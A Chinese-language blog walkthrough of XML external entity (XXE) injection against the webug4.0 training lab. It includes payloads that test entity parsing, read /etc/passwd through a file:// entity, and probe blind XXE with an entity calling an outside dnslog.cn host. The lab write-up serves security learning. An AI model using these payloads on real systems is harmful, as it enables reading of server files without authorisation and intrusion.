1. 首页
  2. 文章中心
  3. web漏洞

webug4.0之xxe注入

180 阅读 0 评论
我是靠谱客的博主 高贵台灯,这篇文章主要介绍webug4.0之xxe注入,现在分享给大家,希望可以做个参考。

关于xxe漏洞,传送门 -》xxe漏洞详解

1. 页面观察

让我们登录,我们随便输入一个字符如admin,观察页面,出现了xml有关的东西,我们就要怀疑存在xml注入

2. 看是否能解析xml数据

这里我们使用burpsuite截取数据包,更好的观察。将以下的测试语句提交到输入框中,如果程序能输出 “my name is nMask”则说明能都解析xml数据


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <?xml version="1.0" encoding="UTF-8"?> 
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <!DOCTYPE root [ 
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <!ENTITY name "my name is nMask">]>
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <root>
        
        &name;
        
        </root>

其对我们的输入的语句进行了URL编码,且程序正确解析了xml数据

2. 读取文件

利用file协议读取/etc/passwd文件,使用burp提交的话需要URL编码


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <?xml version="1.0" encoding="gb2312"?>
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <!DOCTYPE a [
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <!ENTITY test SYSTEM "file:///etc/passwd">
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ]>
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <a>
        
        &test;
        
        </a>

以上是有回显我们才能看到文件被读取才知道存在xxe漏洞,那假如没有回显了,我们可以使用dnslog来探测是否存在xxe漏洞

3. dnslog探测是否存在xxe漏洞


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <?xml version="1.0" encoding="gb2312"?>
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <!DOCTYPE a [
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <!ENTITY xhh SYSTEM "http://r4p4om.dnslog.cn">
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ]>
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        <a>
        
        &xhh;
        
        </a>

说明存在漏洞

 

最后

以上就是高贵台灯最近收集整理的关于webug4.0之xxe注入的全部内容,更多相关webug4内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(119)

相关文章

XXE(外部实体注入漏洞)
XXE(外部实体注入漏洞)
你是如何度过软件测试的瓶颈期,避开这几点,你的职业道路将会走的更好!!
你是如何度过软件测试的瓶颈期,避开这几点,你的职业道路将会走的更好!!
据财经日报显示:超六成专科生月薪低于5000,一文告诉你如何打破职业瓶颈,实现翻盘前言资源领取好文推荐
据财经日报显示:超六成专科生月薪低于5000,一文告诉你如何打破职业瓶颈,实现翻盘前言资源领取好文推荐
一篇文章带你打开软件测试的大门。
一篇文章带你打开软件测试的大门。
webug4.0之xxe注入
webug4.0之xxe注入
什么是系统瓶颈?
什么是系统瓶颈?
关于安卓10以上连接wifi无法联网的问题
关于安卓10以上连接wifi无法联网的问题
Android 6.0 关于WiFi的改变问题:分析原因解决方法:
Android 6.0 关于WiFi的改变问题:分析原因解决方法:

评论列表共有 0 条评论

立即
投稿
返回
顶部